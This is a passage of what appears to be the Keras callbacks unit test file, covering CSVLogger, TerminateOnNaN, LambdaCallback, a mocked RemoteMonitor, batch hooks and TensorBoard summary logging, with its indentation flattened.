model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
# On Windows, due to \r\n line ends, we may end up reading empty lines
# after each line. Skip empty lines.
values = [x for x in csv.reader(f) if x]
assert 'nan' in values[-1], 'The last epoch was not logged.'
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1)  # a length-1 numpy array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_epoch_end_called)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
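# For instance, an epoch-loss scalar written under a train subdirectory would be
# recorded (with an illustrative path) as
# _ObservedSummary(logdir='/tmp/tb/train', tag='epoch_loss').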
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains a summary of an unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(test_combinations.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = test_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = test_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = test_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = test_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=test_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = test_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=test_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
